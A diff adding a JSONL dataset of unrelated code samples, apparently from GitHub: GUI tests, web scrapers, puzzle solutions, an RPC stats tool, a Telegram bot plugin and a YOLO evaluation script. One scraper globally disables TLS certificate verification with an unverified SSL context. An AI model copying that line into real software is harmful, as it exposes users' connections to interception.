diff --git "a/3665.jsonl" "b/3665.jsonl" new file mode 100644--- /dev/null +++ "b/3665.jsonl" @@ -0,0 +1,1095 @@ +{"seq_id":"20577558985","text":"from manygui import *\nfrom manygui.Utils import log\nfrom manygui.Colors import *\n\n# Not all backends support this -- it is not a part of 0.1:\nfrom manygui import Canvas\n\napp = Application()\nwin = Window(size=(300,300))\napp.add(win)\ncvs = Canvas(size=win.size)\nwin.add(cvs)\n\n#def click(x, y, **kw):\ndef click(e):\n x = e.x\n y = e.y\n log('[Mouse clicked at (%i, %i)]' % (x, y))\n if 30 <= x <= 100 and 30 <= y <= 100:\n log('Yay! You clicked the round rect!')\n\nlink(cvs, Events.LeftClickEvent, click)\n\n# Taken from http://piddle.sourceforge.net/sample1.html\n\ncvs.defaultLineColor = Color(0.7,0.7,1.0) # light blue\nif not backend() in 'text curses'.split():\n cvs.drawLines([(i*10,0,i*10,300) for i in range(30)])\n cvs.drawLines([(0,i*10,300,i*10) for i in range(30)])\ncvs.defaultLineColor = black \n\ncvs.drawLine(10, 200, 20, 190, color=red)\ncvs.drawEllipse(130, 30, 200, 100, fillColor=yellow, edgeWidth=4)\n\ncvs.drawArc(130, 30, 200, 100, 45, 50, fillColor=blue, edgeColor=navy, edgeWidth=4)\n\ncvs.defaultLineWidth = 4\ncvs.drawRoundRect(30, 30, 100, 100, fillColor=blue, edgeColor=maroon)\ncvs.drawCurve(20, 20, 100, 50, 50, 100, 160, 160)\n\n#cvs.drawString(\"This is a test!\", 30,130, Font(face=\"times\",size=16,bold=1), \n# color=green, angle=-45)\n\npolypoints = [(160,120), (130,190), (210,145), (110,145), (190,190)]\ncvs.drawPolygon(polypoints, fillColor=lime, edgeColor=red, edgeWidth=3, closed=1)\n\ncvs.drawRect(200, 200, 260, 260, edgeColor=yellow, edgeWidth=5)\ncvs.drawLine(200, 260, 260, 260, color=green, width=5)\ncvs.drawLine(260, 200, 260, 260, color=red, width=5)\n\n#cvs.flush()\n\napp.run()\n","repo_name":"progval/Manygui","sub_path":"test/test_canvas.py","file_name":"test_canvas.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"72837613","text":"from jinja2 import Environment, FileSystemLoader\n\nimport shutil\nimport time\nimport os\nimport subprocess\nimport json\nfrom typing import List, Dict, Tuple, Any\n\n_apptainer_cmd = None\n\n\ndef get_apptainer_cmd() -> str:\n global _apptainer_cmd\n\n if _apptainer_cmd is not None:\n return _apptainer_cmd\n\n _apptainer_cmd = shutil.which(\"apptainer\")\n if _apptainer_cmd is None:\n _apptainer_cmd = shutil.which(\"singularity\")\n if _apptainer_cmd is None:\n raise RuntimeError(\"apptainer or singularity not found in PATH\")\n\n return _apptainer_cmd\n\ndef run_apptainer(sif_path: str, command: List[str], volumes: List[Tuple[str, str]]) -> Dict[str, Any]:\n\n cmd = [get_apptainer_cmd()]\n\n volumes_tmp = [f\"{v[0]}:{v[1]}\" for v in volumes]\n cmd.extend([\"run\", \"--bind\", \",\".join(volumes_tmp), sif_path])\n cmd.extend(command)\n\n time_0 = time.time()\n proc_result = subprocess.run(cmd, capture_output=True, text=True)\n time_1 = time.time()\n\n if proc_result.returncode == 0:\n return {\"success\": True, \"stdout\": proc_result.stdout}\n else:\n msg = (\n f\"Running in apptainer failed with error code {proc_result.returncode}\\n\"\n f\"stdout: {proc_result.stdout}\\n\"\n f\"stderr: {proc_result.stderr}\"\n )\n\n ret = {\"success\": False, \"error\": {\"error_type\": \"RuntimeError\", \"error_message\": msg}}\n return ret\n \ndef render_input(template_directory: str, template_name: str, inputs: Dict[str, Any], filename: str = None) -> str:\n environment = 
Environment(loader=FileSystemLoader(template_directory))\n template = environment.get_template(template_name)\n\n if filename is None:\n filename = f\"{'_'.join(list(inputs.keys()))}\"\n\n content = template.render(inputs)\n\n with open(filename, mode=\"w\", encoding=\"utf-8\") as input:\n input.write(content)\n \n return filename\n\ndef process_molecule(molecule_name: str, molecules: List[List[str]]) -> str:\n proc_mol = f\"{molecule_name} {{\\n\"\n for mol in molecules:\n mol_str = \" \"\n for i in range(0,len(mol)):\n mol_str += f\"{mol[i]} \"\n mol_str += \"\\n\"\n \n proc_mol += mol_str\n proc_mol += \"}\"\n return proc_mol\n\ndef render_psi4_input(template_directory: str, template_name: str, inputs: Dict[str, Any], output_path: str, filename: str = None) -> str:\n environment = Environment(loader=FileSystemLoader(template_directory))\n template = environment.get_template(template_name)\n \n hf_methods = [\"HF\", \"MP2\", \"MP4\", \"CCSD(T)\"]\n dft_methods = [\"PBE\", \"B3LYP\", \"M06\", \"M06-D3\"]\n if inputs[\"method\"] in hf_methods:\n inputs[\"reference\"] += \"hf\"\n elif inputs[\"method\"] in dft_methods:\n inputs[\"reference\"] += \"ks\"\n else:\n raise TypeError(\"Method not recognized as HF or DFT method.\")\n\n if filename is None:\n filename = f\"{'_'.join(list(inputs.keys()))}\"\n\n content = template.render(inputs)\n\n with open(output_path+filename, mode=\"w\", encoding=\"utf-8\") as input:\n input.write(content)\n \n return filename\n\n\n# mol_name = \"benzene\"\n# mol_list = [[\"0\", \"1\"],\n# [\"C\", \"-0.332299786126\", \"1.266293763992\", \"-2.614838533626\"],\n# [\"C\", \"0.349364948473\", \"-1.405736084573\", \"-2.053211127230\"],\n# [\"C\", \"1.020488041771\", \"0.885549327624\", \"-2.541894070443\"],\n# [\"C\", \"-1.003239896063\", \"-1.025876820472\", \"-2.129389566957\"],\n# [\"C\", \"-1.344397149122\", \"0.310721315449\", \"-2.406682914582\"],\n# [\"C\", \"1.361021504218\", \"-0.450112768420\", \"-2.258845478849\"],\n# [\"H\", \"-0.597444236584\", \"2.304886349910\", \"-2.828097741910\"],\n# [\"H\", \"0.615252976785\", \"-2.442033294231\", \"-1.829683359417\"],\n# [\"H\", \"1.806668588160\", \"1.628112492256\", \"-2.700437111401\"],\n# [\"H\", \"-1.790003212223\", \"-1.767955258107\", \"-1.970079207440\"],\n# [\"H\", \"-2.394850547123\", \"0.607656321453\", \"-2.458092486410\"],\n# [\"H\", \"2.411449677875\", \"-0.744182632917\", \"-2.193390546325\"]]\n# mol_str = process_molecule(mol_name, mol_list)\n# inputs = {\n# \"calculation\": 'optimize',\n# \"method\": 'HF',\n# \"freeze_core\": 'True',\n# \"reference\": 'r',\n# \"basis_set\": 'aug-cc-pVDZ',\n# \"molecule\": mol_str\n# }\n# with open(\"psi4_test.json\", \"w\") as file:\n# file.write(json.dumps(inputs))\n# print(inputs)\n\n# inputs = {}\n# with open(\"psi4_test.json\", \"r\") as file:\n# inputs = json.load(file)\n\n# filename = \"psi4_test.in\"\n# output_path = \"/mnt/c/Users/Sam_Local/Desktop/Molssi/flask_testing/task_executer/data/\"\n# input_file = render_psi4_input(template_directory=f\"{os.getcwd()+'/templates'}\", template_name=\"input_template\", inputs=inputs, output_path=output_path, filename=filename)\n# commands = [[\"psi4\", \"--version\"], [\"psi4\", \"-i\", f\"/data/{input_file}\", \"-o\", \"/data/output.dat\"]]\n# result = run_apptainer(\"./container/education_container.sif\", commands[1], [[\"/mnt/c/Users/Sam_Local/Desktop/Molssi/flask_testing/task_executer/data\", \"/data\"]])\n# 
print(result)","repo_name":"sjayellis/ews_backend","sub_path":"task_runner/run_calculation.py","file_name":"run_calculation.py","file_ext":"py","file_size_in_byte":4962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38630380151","text":"'''\nreference\nhttps://clay-atlas.com/blog/2020/11/25/python-cn-sloved-urllib-error-urlerror/\nhttps://itsmycode.com/python-urllib-error-httperror-http-error-403-forbidden/\nhttps://zwindr.blogspot.com/2017/12/python-pyquery.html\nhttps://codertw.com/%E7%A8%8B%E5%BC%8F%E8%AA%9E%E8%A8%80/360045/ \n'''\nimport shutil\nfrom pyquery import PyQuery\nimport ssl\nfrom urllib.request import Request, urlopen\nimport re\nimport requests\nfrom os import path\n\nssl._create_default_https_context = ssl._create_unverified_context\n\nlink = 'https://pokemondb.net/pokedex/all' # pokedex\n\nreq = Request(link, headers={'User-Agent':'Mozilla/5.0'})\nwebpage = urlopen(req).read()\ndom = PyQuery(webpage)\nlinks = dom.find('tr')\n# print(links)\n\npokemons_idx = []\npokemons_name = []\nfor idx, k in enumerate(links.items()):\n id = k.find('.infocard-cell-data').text()\n if not (id in pokemons_idx):\n pokemons_idx.append(id)\n name = k.find('.ent-name').text()\n pokemons_name.append(name)\n\npokemons_data = {}\n# print(len(pokemons_idx))\n# print(len(pokemons_name))\nfor i in range(len(pokemons_name)):\n pokemons_data[pokemons_idx[i]] = pokemons_name[i]\npokemons_data = {k:v for k, v in pokemons_data.items() if v}\n# print(pokemons_data)\n\n\ndoc = PyQuery(url=link)\npokemons_ = doc.find('tr').children()\npokemons_index = pokemons_.find('.infocard-cell-data').text().split(' ')\npokemons_name = pokemons_.find('.ent-name').text().split(' ')\n\n# print(pokemons_index, pokemons_name)\n\npokedex = dict(zip(pokemons_index, pokemons_name))\n# print(pokedex)\n\n# Pokedex Link\npokemons_link = 'https://pokemondb.net/pokedex/all'\n# Get all info from link (html)\ndoc = PyQuery(url=pokemons_link)\n# Get pokemons img src url\npokemons_urls = doc.find('td').find('span').children()\npokemons_img = dict()\n# print(pokemons_urls)\nempty_img = 'https://img.pokemondb.net/s.png' # Filter the empty img\nfor item in pokemons_urls:\n item = PyQuery(item)\n if not re.match(item.attr('data-src'), empty_img):\n url = item.attr('data-src')\n poke_name = str(url).split('/')[-1][:-4]\n pokemons_img[poke_name] = url\n# print(pokemons_img)\n\n# Save the img to db\nfolder = './PyQuery/pokemons/'\nfor img_url in pokemons_img.values():\n img_name = folder + str(img_url).split('/')[-1]\n if path.exists(img_name):\n print('Continuing ...')\n continue\n img_data = requests.get(url=img_url, stream=True)\n if img_data.status_code == 200:\n # Set decode_content be True, otherwise the downloaded image file's size will be zero\n img_data.raw.decode_content = True\n with open(img_name, 'wb') as f:\n shutil.copyfileobj(img_data.raw, f)\n print('Image sucessfully Downloaded: ',img_name)\n else:\n print('Image Couldn\\'t be retreived')\n\n# Regular Expression match testing\nstr1 = 'hello'\nstr2 = ' HellO '\nprint(re.match(str1.lower(), str2.lower())) # Return None\nprint(re.match(str1.lower().strip(), str2.lower().strip())) # Return <0, 5>","repo_name":"justbuyyal/MVCLab-Summer-Course","sub_path":"PyQuery/python_query_test.py","file_name":"python_query_test.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17936234358","text":"## 내 풀이 \ndef 
solution(answers):\n answer = [0 for i in range(3)]\n pattern1 = [1,2,3,4,5]\n pattern2 = [2,1,2,3,2,4,2,5]\n pattern3 = [3,3,1,1,2,2,4,4,5,5]\n \n for i in range(len(answers)):\n ans = answers[i]\n if(pattern1[i % len(pattern1)] == ans):\n answer[0] += 1\n if(pattern2[i % len(pattern2)] == ans):\n answer[1] += 1\n if(pattern3[i % len(pattern3)] == ans):\n answer[2] += 1 \n \n result = []\n for i in range(len(answer)):\n if(answer[i] == max(answer)):\n result.append(i+1)\n \n return sorted(result)\n\n## 다른 사람의 풀이\n\ndef solution(answers):\n pattern1 = [1,2,3,4,5]\n pattern2 = [2,1,2,3,2,4,2,5]\n pattern3 = [3,3,1,1,2,2,4,4,5,5]\n score = [0, 0, 0]\n result = []\n\n for idx, answer in enumerate(answers):\n if answer == pattern1[idx%len(pattern1)]:\n score[0] += 1\n if answer == pattern2[idx%len(pattern2)]:\n score[1] += 1\n if answer == pattern3[idx%len(pattern3)]:\n score[2] += 1\n\n for idx, s in enumerate(score):\n if s == max(score):\n result.append(idx+1)\n\n return result","repo_name":"GraceKim527/Pygorithm","sub_path":"Programmers/Level 1/모의고사.py","file_name":"모의고사.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20792683493","text":"def remove_Duplicates(nums):\n n = len(nums)\n index = 1\n for i in range( 1,n):\n if nums[i] != nums[i-1]:\n nums[index]= nums[i]\n index += 1\n return index\n\narray = [1,2,3,9,9,9,10,10,20,20,20,20,20,21,21]\nprint(remove_Duplicates(array))","repo_name":"muradtheOZ/problem-solving","sub_path":"one-remove-duplicates-from-array.py","file_name":"one-remove-duplicates-from-array.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20727227802","text":"import io\nfrom operator import mod\nimport sys\n\n_INPUT = \"\"\"\\\nFAC\n\n\n\"\"\"\nsys.stdin = io.StringIO(_INPUT)\n# ---------------------------------\ns = input()\nss = set([\"ACE\", \"BDF\", \"CEG\", \"DFA\", \"EGB\", \"FAC\", \"GBD\"])\n\nif s in ss:\n print(\"Yes\")\nelse:\n print(\"No\")\n","repo_name":"makima333/Atcoder-ganbaru","sub_path":"contest/abc312/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17118157116","text":"from bs4 import BeautifulSoup\nimport requests\nimport pandas as pd\nfrom unidecode import unidecode\nimport re\nimport time\nfrom selenium import webdriver\n\ndriver = webdriver.PhantomJS(\"/home/vargha/phantomjs-2.1.1-linux-x86_64/bin/phantomjs\")\n\nheader = ['Name', 'Main Web Page', 'Main Image', 'Second Image', 'Third Image', 'Fourth Image', 'Fifth Image',\n 'Sixth Image', 'Seventh Image', 'Eighth Image', 'Ninth Image', 'Tenth Image', 'Price', 'Value of Discount',\n 'Collar', 'Sleeve']\n\n\ndef get_digistyle():\n categories = {\n \"t-shirt\": \"https://www.digistyle.com/category-men-tee-shirts-and-polos/\",\n \"shirt\": \"https://www.digistyle.com/category-men-shirts\",\n \"pants\": \"https://www.digistyle.com/category-men-trousers-jumpsuits\",\n \"jeans\": \"https://www.digistyle.com/category-men-jeans\"\n }\n base_link = \"https://www.digistyle.com\"\n # df = []\n for category_name, category in categories.items():\n df_lst = []\n href_list = []\n browser = webdriver.Firefox()\n browser.get(category)\n len_of_page = browser.execute_script(\n \"window.scrollTo(0, document.body.scrollHeight);var len_of_page=document.body.scrollHeight;return 
len_of_page;\")\n match = False\n while not match:\n last_count = len_of_page\n time.sleep(10)\n len_of_page = browser.execute_script(\n \"window.scrollTo(0, document.body.scrollHeight);var len_of_page=document.body.scrollHeight;return len_of_page;\")\n if last_count == len_of_page:\n match = True\n\n source_data = browser.page_source\n soup = BeautifulSoup(source_data, features='lxml')\n\n # for p in range(1, 250):\n # file_link = category + str(p)\n # try:\n # page = requests.get(category)\n # except requests.exceptions.ConnectionError:\n # print(f'connection error {file_link}')\n # continue\n # soup = BeautifulSoup(page.content, 'html.parser')\n try:\n ul_cloth_list = soup.find_all(\"div\", class_=\"c-product-grid js-product-grid\")[0]\n a_links = ul_cloth_list.find_all('a')\n if not a_links:\n break\n for link in a_links:\n # if len(link.contents) == 3:\n href = link['href']\n title = href[9:]\n img_link = base_link + href\n if href not in href_list:\n href_list.append(href)\n clothes_filters = ['تی شرت', 'شلوار', 'پیراهن', 'تیشرت']\n if any(clothes in title for clothes in clothes_filters):\n row = [title, img_link]\n try:\n page_ = requests.get(img_link)\n except requests.exceptions.ConnectionError:\n print(f'connection error {img_link}')\n continue\n soup_ = BeautifulSoup(page_.content, 'html.parser')\n image_divs = soup_.find_all('div', class_=\"swiper-wrapper\")\n if len(image_divs) == 0:\n continue\n else:\n image_divs = image_divs[0]\n images = image_divs.find_all('img', class_='c-product-item__image')\n main = [img for img in images if img['alt'][-1] == '1']\n if len(main) != 1:\n continue\n images.insert(0, main[0])\n for img in images:\n img_link = img['src']\n cursor = img_link.find('.jpg')\n img_link = img_link[:cursor + 4]\n if img_link not in row:\n row.append(img_link)\n print(len(row) - 1, \" images has been added!\")\n number_of_pictures = 10 - (len(row) - 2)\n if number_of_pictures != 0:\n for i in range(number_of_pictures):\n row.append([])\n price = soup_.find_all('div', {\n 'class': 'c-price-container c-price-container--quick-view-price-original js-rrp-price'})\n fee = price[0]['data-price-value']\n fee = unidecode(fee)\n fee = fee.replace(\",\", \"\")\n fee = int(fee) * 10\n discount = price[0].next['data-price-value']\n discount = unidecode(discount)\n discount = discount.replace(\",\", \"\")\n if any(char.isdigit() for char in discount):\n discount = ''.join(i for i in discount if i.isdigit())\n discount = int(discount) * 10\n else:\n discount = []\n row.append(fee)\n row.append(discount)\n details = soup_.find_all('ul', {'class': 'c-product__specs-table'})\n details_text = details[0].text\n collar_pattern = r'یقه(\\s*>?\\S.*\\s)'\n sleeve_pattern = r'آستین(\\s*>?\\S.*\\s)'\n if category_name == \"shirt\":\n collar = re.findall(collar_pattern, details_text)\n if not collar:\n row.append([])\n else:\n collar_text = collar[0].replace('\\r', '').replace('\\n', '').replace(' ', '')\n row.append(collar_text)\n\n sleeve = re.findall(sleeve_pattern, details_text)\n if not sleeve:\n row.append(\"بلند\")\n else:\n sleeve_text = sleeve[0].replace('\\r', '').replace('\\n', '').replace(' ', '')\n row.append(sleeve_text)\n elif category_name == 't-shirt':\n collar = re.findall(collar_pattern, details_text)\n if not collar:\n row.append([])\n else:\n collar_text = collar[0].replace('\\r', '').replace('\\n', '').replace(' ', '')\n row.append(collar_text)\n sleeve = re.findall(sleeve_pattern, details_text)\n if not sleeve:\n row.append(\"کوتاه\")\n else:\n sleeve_text = 
sleeve[0].replace('\\r', '').replace('\\n', '').replace(' ', '')\n row.append(sleeve_text)\n else:\n row.append([])\n row.append([])\n df_lst.append(row)\n df = pd.DataFrame(df_lst, columns=header)\n df.to_csv(f'/home/vargha/Desktop/digi_style_{category_name}_links.csv', columns=header,\n index=False)\n except:\n pass\n\n print(f'category : {category_name} is done: {len(df_lst)}')\n df = pd.DataFrame(df_lst, columns=header)\n df.to_csv(f'/home/vargha/Desktop/digi_style_{category_name}_links.csv', columns=header, index=False)\n\n\nif __name__ == '__main__':\n get_digistyle()\n","repo_name":"Vargha-Kh/Deep-Learning-Practices","sub_path":"Web Crawling For Images/Digistyle/get_digi_style.py","file_name":"get_digi_style.py","file_ext":"py","file_size_in_byte":7746,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12686069980","text":"import numpy as np\r\nimport pygame as pg\r\n\r\nclass Player:\r\n def __init__( self, x, y, screen ):\r\n self.x = x\r\n self.y = y\r\n self.img = pg.transform.scale( pg.image.load( 'assets/plane.png' ), ( 32, 32 ) )\r\n self.screen = screen\r\n self.angle = 270.0\r\n self.position = np.array( [ self.x, self.y ] )\r\n self.center = self.position + 16\r\n self.speed = 0.6\r\n self.max_speed = 0.8\r\n self.min_speed = 0.4\r\n self.speed_increment = 0.05\r\n self.delta = np.array( [ np.cos(self.angle), np.sin(self.angle) ] ) * self.speed\r\n self.rotation = 0.0\r\n self.size = 32\r\n self.max_hp = 5\r\n self.hp = self.max_hp\r\n self.ammo = 80\r\n self.bomb_cap = 5\r\n self.current_bombs = self.bomb_cap\r\n \r\n def draw( self ):\r\n rot_angle = 270 - self.angle\r\n rotated = pg.transform.rotate( self.img, rot_angle )\r\n self.screen.blit( rotated, ( self.position[ 0 ], self.position[ 1 ] ) )\r\n # pg.draw.rect( self.screen, [255,0,0], self.get_rect() )\r\n\r\n def increment_speed( self ):\r\n if self.speed < self.max_speed: self.speed += self.speed_increment\r\n if self.speed > self.max_speed: self.speed = self.max_speed\r\n\r\n def decrement_speed( self ):\r\n if self.speed > self.min_speed: self.speed -= self.speed_increment\r\n if self.speed < self.min_speed: self.speed = self.min_speed\r\n\r\n def get_rotation_increment( self ):\r\n if self.speed > 0.75: return 0.15\r\n if self.speed > 0.7: return 0.18\r\n if self.speed > 0.65: return 0.21\r\n if self.speed > 0.6: return 0.24\r\n if self.speed > 0.55: return 0.27\r\n if self.speed > 0.5: return 0.30\r\n else: return 0.33\r\n\r\n def get_rect( self ):\r\n return pg.Rect( self.position + 4, ( self.size - 4, self.size - 4 ) )\r\n \r\n def draw_hearts( self, full: pg.image, empty: pg.image, x_coordinate, y_coordinate ):\r\n for i in range( self.hp ):\r\n self.screen.blit( full, ( x_coordinate - 20 * i, y_coordinate ) )\r\n for i in range( self.max_hp - self.hp ):\r\n self.screen.blit( empty, ( x_coordinate - 20 * ( self.max_hp - 1 - i ), y_coordinate ) )\r\n\r\n def draw_bombs( self, full: pg.image, empty: pg.image, x_coordinate, y_coordinate ):\r\n for i in range( self.current_bombs ):\r\n self.screen.blit( full, ( x_coordinate - 20 * i, y_coordinate ) )\r\n for i in range( self.bomb_cap - self.current_bombs ):\r\n self.screen.blit( empty, ( x_coordinate - 20 * ( self.bomb_cap - 1 - i ), y_coordinate ) )\r\n\r\n def check_borders( self, w, h ):\r\n if self.position[ 0 ] + 5 * self.delta[ 0 ] < 0: self.position[ 0 ] = 0\r\n if self.position[ 0 ] + 5 * self.delta[ 0 ] > w - self.size: self.position[ 0 ] = w - self.size\r\n if self.position[ 1 ] + 5 * 
self.delta[ 1 ] < 0: self.position[ 1 ] = 0\r\n if self.position[ 1 ] + 5 * self.delta[ 1 ] > h - self.size: self.position[ 1 ] = h - self.size\r\n\r\n def update( self ):\r\n a = self.angle\r\n s = self.speed\r\n self.position += self.delta\r\n self.center = self.position + 16\r\n self.delta[ 0 ] = s * np.cos( a * np.pi / 180 )\r\n self.delta[ 1 ] = s * np.sin( a * np.pi / 180 )\r\n self.angle += self.rotation\r\n","repo_name":"PrinceOfCzechia/Dogfight","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":3344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25924867413","text":"import requests\nfrom flask import Flask, render_template, request\nimport json\nimport os\nos.system('clear')\n\nbase_url = \"http://hn.algolia.com/api/v1\"\n\n# This URL gets the newest stories.\nnew = f\"{base_url}/search_by_date?tags=story\"\n\n# This URL gets the most popular stories\npopular = f\"{base_url}/search?tags=story\"\n\n\n# This function makes the URL to get the detail of a storie by id.\n# Heres the documentation: https://hn.algolia.com/api\ndef make_detail_url(id):\n return f\"{base_url}/items/{id}\"\n\n\ndb = {}\napp = Flask(\"DayNine\")\n\ndef get_html(html):\n list_hits = []\n result_html = requests.get(html)\n html_html = json.loads(result_html.text)\n hits = html_html['hits']\n for hit in hits:\n html_row = {\n 'title': hit['title'],\n 'url': hit['url'],\n 'author': hit['author'],\n 'points': hit['points'],\n 'num_comments': hit['num_comments'],\n 'objectID': hit['objectID']\n }\n list_hits.append(html_row)\n \n return list_hits\n\n\n@app.route(\"/\")\ndef index():\n order_by = request.args.get('order by')\n if order_by:\n if order_by == 'new':\n if db.get(order_by):\n list_hits = db.get(order_by)\n else:\n list_hits = get_html(new)\n db[order_by] = list_hits\n elif order_by == 'popular':\n list_hits = db.get(order_by)\n else:\n list_hits = get_html(popular)\n order_by = 'popular'\n db[order_by] = list_hits\n order_by = order_by.capitalize()\n\n return render_template(\"index.html\", list_hits = list_hits, order_by = order_by)\n\n@app.route(\"/\")\ndef detail(objectID):\n result_detail = requests.get(make_detail_url(objectID))\n html_detail = json.loads(result_detail.text)\n\n return render_template(\"detail.html\", html_detail = html_detail)\n\n\napp.run(host=\"0.0.0.0\")\n","repo_name":"zpdl95/python-scrapper","sub_path":"challenge/day-7-blueprint.py","file_name":"day-7-blueprint.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8415049298","text":"import os\nimport http.client\nimport json\nimport time\nimport sys\nimport getopt\n\n\ndef usage():\n ''' Display program usage. '''\n progname = os.path.split(sys.argv[0])[1]\n if os.path.splitext(progname)[1] in ['.py', '.pyc']:\n progname = 'python ' + progname\n return 'Usage: %s [--host=...] 
<--port=...> [--method=...]' % progname\n\n\ndef get_rpc_stat(host, port):\n conn = http.client.HTTPConnection(host, port)\n conn.request('GET', '/inspect/rpc_stats')\n data = conn.getresponse().read()\n conn.close()\n return json.loads(data.decode('utf-8'))\n\n\ndef dump_stat_periodically(host, port, method):\n i = 0\n while i < 60:\n if i % 15 == 0:\n detail = '|reqs succ fail min/max/avg(ms)| in each cloumn'\n print('stating %s:%s:%s\\n%s' % (host, port, method, detail))\n print('%s%s%s%s' %\n ('|--in last second----|', '---in last minute----|',\n '-------in last hour-------|',\n '-----------since start--------|'))\n data = get_rpc_stat(host, port)[method]\n ct_total = data['counter']['total']\n ct_succ = data['counter']['success']\n ct_fail = data['counter']['failure']\n line = ''\n for k in ['last_second', 'last_minute', 'last_hour', 'total']:\n latency = data['latency'][k]\n line += '%4s %4s %4s %s/%s/%s' % (\n ct_total[k], ct_succ[k], ct_fail[k], latency['min'],\n latency['max'], latency['average']) + '|'\n line = line[:-1]\n print(line)\n time.sleep(1)\n i = i + 1\n\n\n\ndef main():\n opts, args = getopt.getopt(sys.argv[1:], '',\n ['host=', 'port=', 'method=', 'help'])\n if '--help' in opts:\n print(usage())\n sys.exit(0)\n\n host = '127.0.0.1'\n port = 0\n method = 'global'\n for o, a in opts:\n if o in '--host':\n host = a\n elif o in '--port':\n port = a\n elif o in '--method':\n method = a\n\n if port == 0:\n print(usage())\n sys.exit(-1)\n\n dump_stat_periodically(host, port, method)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Tencent/flare","sub_path":"flare/tools/rpc_stat.py","file_name":"rpc_stat.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":1199,"dataset":"github-code","pt":"21"} +{"seq_id":"35394525352","text":"\"\"\"Get info about a File Extension\nSyntax: .filext EXTENSION\"\"\"\nimport requests\nfrom bs4 import BeautifulSoup\nfrom uniborg.util import admin_cmd\n\nfrom telebot import CMD_HELP\n\n\n@telebot.on(admin_cmd(pattern=\"filext (.*)\"))\n@telebot.on(admin_cmd(pattern=\"filext (.*)\", allow_sudo=True))\nasync def _(event):\n if event.fwd_from:\n return\n await eor(event, \"Processing ...\")\n sample_url = \"https://www.fileext.com/file-extension/{}.html\"\n input_str = event.pattern_match.group(1).lower()\n response_api = requests.get(sample_url.format(input_str))\n status_code = response_api.status_code\n if status_code == 200:\n raw_html = response_api.content\n soup = BeautifulSoup(raw_html, \"html.parser\")\n ext_details = soup.find_all(\"td\", {\"colspan\": \"3\"})[-1].text\n await eor(\n event,\n \"**File Extension**: `{}`\\n**Description**: `{}`\".format(\n input_str, ext_details\n ),\n )\n else:\n await eor(\n event,\n \"https://www.fileext.com/ responded with {} for query: {}\".format(\n status_code, input_str\n ),\n )\n\n\nCMD_HELP.update(\n {\"fileext\": \".fileext \\nUse - Get info on that file extension.\"}\n)\n","repo_name":"xditya/TeleBot","sub_path":"telebot/plugins/fileext.py","file_name":"fileext.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":197,"dataset":"github-code","pt":"21"} +{"seq_id":"40074302291","text":"#! /usr/bin/env python\n\nimport os\nimport cv2\nimport matplotlib.pyplot as plt\nfrom frontend import YOLO\nimport json\nimport pandas as pd\n\n\n''' This file will read the video file created from the images (see img2video.py), it will run it through the\nmodified network and get the pose_x. 
It will then calculate the error abs(actual-predicted), and the plot it '''\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\" # \"0\" use cpu\n\n# CONFIGURATION\nimage_path = '/home/ubuntu/tensorflow_data/output.mp4'\nconfig_path = 'config_cargo_door.json'\nweights_path = '/home/ubuntu/tensorflow_data/YOLO/CargoDoor/full_yolo_cargo_door_with_pose_v6.h5'\n\nwith open(config_path) as config_buffer:\n config = json.load(config_buffer)\n\n###############################\n# Make the model\n###############################\nyolo = YOLO(architecture=config['model']['architecture'],\n input_size=config['model']['input_size'],\n labels=config['model']['labels'],\n max_box_per_image=config['model']['max_box_per_image'],\n anchors=config['model']['anchors'])\n\n###############################\n# Load trained weights\n###############################\nprint(weights_path)\nyolo.load_weights(weights_path)\n\n###############################\n# Load true pose data\n###############################\ncsv_filename = '/home/ubuntu/catkin_ws/src/Northstar/airplane_loader/scripts/image_pose_data.csv'\ntrue_pose_x = pd.read_csv(csv_filename, usecols=['pose_x'])\ntrue_pose_x = true_pose_x.values\n\n###############################\n# Run modified yolo\n###############################\ncounter = 0\n\nif image_path[-4:] == '.mp4':\n video_reader = cv2.VideoCapture(image_path)\n\n nb_frames = int(video_reader.get(cv2.cv.CV_CAP_PROP_FRAME_COUNT))\n print(\"The number of frames are: \" + str(nb_frames + 1))\n frame_h = int(video_reader.get(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT))\n frame_w = int(video_reader.get(cv2.cv.CV_CAP_PROP_FRAME_WIDTH))\n\n error = [] # store per image rpy loss in an list\n pred_pose_list = []\n true_pose_list = []\n\n for i in range(nb_frames):\n print(\"\\npredicting for frame: \" + str(i))\n _, image = video_reader.read()\n _, rpy = yolo.predict(image)\n #print(rpy)\n # print(\"true_pose_x: \" + str(true_pose_x[i]) + \"\\tpredicted pose_x: \" + str(rpy[0]))\n if any(rpy):\n loss = abs(true_pose_x[i] - rpy[0])\n error.append(loss)\n pred_pose_list.append(rpy[0])\n true_pose_list.append(true_pose_x[i])\n\n\n samples = [s for s in range(len(true_pose_list))]\n plt.plot(samples, true_pose_list, color='skyblue')\n plt.plot(samples, pred_pose_list, color='red')\n plt.xlabel('frames with detected CargoDoors')\n plt.title('True(blue) vs Predicted(red) values for pose_x using modified YOLO')\n plt.ylabel('pose_x in radians')\n plt.show()\n 